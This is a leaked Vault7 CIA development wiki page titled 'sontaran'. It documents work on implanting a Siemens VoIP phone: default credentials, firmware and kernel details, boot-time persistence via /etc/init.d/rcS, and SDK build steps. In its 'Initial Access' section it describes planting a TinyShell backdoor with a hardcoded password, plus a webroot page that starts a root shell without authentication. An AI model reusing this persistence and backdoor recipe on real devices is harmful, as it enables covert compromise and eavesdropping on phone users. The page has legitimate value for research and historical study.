Vault7: CIA Hacking Tools Revealed
Navigation: » Latest version
sontaran
Development Notes
Credentials
- https://10.3.2.151/
- phone menu password – 123456
- web interface admin – 123456
System Configuration
- Firmware V2 R0.90.0 6/29/2012
webroot = /Opera_Deploy/appWeb/web
- Phone runs linux-2.4.31
- Processor is MIPS-BE
- /tmp is reset each time the phone is booted
- for boot time execution, creating /etc/rc.local, /etc/init.d/test.sh, /etc/rc.d/rc3.d/test.sh did not work. Might try modifying /etc/init.d/rcS or /etc/inittab or /etc/profile (per INCA_IP2_LinuxBSP_Rel2.0_UM_PR_Rev1.0.pdf, Section 2.2). /etc/init.d/rcS tested and known to work.
- System loads kernel drivers in /etc/init.d/rcS from /lib/modules/2.4.31-INCAIP2-01.03.00/kernel/drivers/siemens-opera/
- Good information can be found by cat-ing the various files in /proc/driver and /proc/devices.
- From /proc/driver/ifx_mps/version – MPS Mailbox version 1.2.1 (SDKSoftware Development Kit has v1.2.3 from source/kernel/ifx/bsp/arch/mips/infineon/incaip2/mps/mps_linux.c)
- From
Establishing Initial Access for Development
- Use the hive-builder 10.2.5.2 (or another) to cross compile code for the phone.
- The phone temporarily allows SSHSecure Shell access to the admin user via the web interface (Administrator Pages > Maintenance > Secure Shell).
- Files can be transferred to the phone via TFTPFile transfer software (don't forget to chmod a+x the file once it is transferred to the phone).
phone$ tftp -g -r <filename> <hostname> <port>
wkstn$ sudo /usr/sbin/in.tftpd --daemon --port 6969 /tmp (this is for atftpd)
- The web server attempts to execute (yes, execute) any page requested by a client.
- The webroot directory is writable by the admin user.
- TinyShell (tsh) has been compiled for the phone for port 12345 and password "wboKtbEYVTWAVIig". Using the admin user via SSHSecure Shell and TFTP, tsh was put in /usr/sbin and the webroot. Additionally, a script named tshd.cmd has also been placed in the webroot. To start tsh, hit this page https://10.3.2.151/tshd.cmd . Web interface credentials are not required. That page will provide status, and in the background, it will kick off tsh with root privileges. Use the tsh client to connect for root shell.
SDK
- Documentation is from 2006
- INCA, VMMC, and HAPIHL7 Application Programming Interface driver code in SDKSoftware Development Kit Bundle. Run EASY\Software\TAPIv3\ifx_tapi.run and it will create a folder ifx_tapi with a driver for each folder. Although kernel code, there are several header files for the using....
- Example user-space programs are Linux Board Support Package. Untar EASY\Software\Linux_BSP. In the extracted files, iip2_linuxbsp_02.02.01\source\user\ifx.
- The /dev/vmmc1X files are not available by default. The documentation indicates these are higher level APIs and will make writing applications easier. The documentation indicates the following kernel modules must be loaded in this order: insmod drv_tapi, drv_vmmc. Building these modules also produces a hapi.o file. Currently, this module fails on load. However, my current assessment from the documentation is that the HAPIHL7 Application Programming Interface APIApplication Programming Interface is not needed.
- The most relevant SDKSoftware Development Kit Documentation:
- TAPI API – TAPI_V3_UM_PR_Rev15.pdf
- ifx_mps API – INCA_IP2_LinuxBSP_Rel2.0_UM_PR_Rev1.0.pdf
- to build the kernel, modules, demo applications, and busybox – EASY21653_LinuxBSP_Rel2.2_GS_Rev2.4.pdf
- HAPI API – SPINACER_VoIP_IPP_Subsystem_HAPI_Rel2.2_UM_PR_Rev1.1.pdf
- mps.h – definitions for registers and mailbox structures
- mps/proc/debug.h – currently not enabled
- commands in kernel/ifx/bsp/arch/mips/infineon/incaip2/basic/ikos.c – several messages given, test code could be modified for standalone program???
Building the SDK
- Not necessary, but the easiest way to build the provided sample code and kernel modules. Use EASY21653_LinuxBSP_Rel2.2_GS_Rev2.4.pdf with the following additional comments:
- Start with Para 4, Software Installation
- Para 4.1 – "uclibc-toolchain" not part of path, add PATH and CCACHE_PATH to ~/.bash_profile
- Para 5.1.1 – Select 'Change default configurations' else some of the dependent configurations will not be created
- Para 5.1.1 – For 'Select Toolchain', used 'Only_3_3_6_based' since building kernel and user applications.
- Para 5.1.1 – Ensure path to toolchain is correct. 'Build Directory Path' was empty, so I added it.
- Para 5.1.1 – When it comes to choosing which applications to build, I built all but the phone applications and the opensource applications
- Para 5.1.2 – 'make images' was good enough for me, but only after doing the following.
- 'cd ifx-com-linux/source/user/ifx/ifx_tapi'; and './build.sh config-only'
- 'cd ifx-com-linux/source/user/ifx/ifx_vmmc'; and './build.sh config-only' (or possibly just 'build.sh')
- then run 'make images' and kernel modules are output to /tmp/build/root-filesystem/user/local/pa – copy drv_tapi, drv_vmmc, and hapi.o
- Once you insmod drv_tapi and then drv_vmmc, there will be additional /dev/vmmc1X devices and entries in /proc/driver and /proc/devices
Next Steps
- Try to load my drivers at boot time, first
- Continue to look at source
- Check older phones for presence of /dev/vmmc1X
- Are some modules loaded only when connected to the call manager?
- Continue to study the sample applications that use the ifx_mps interface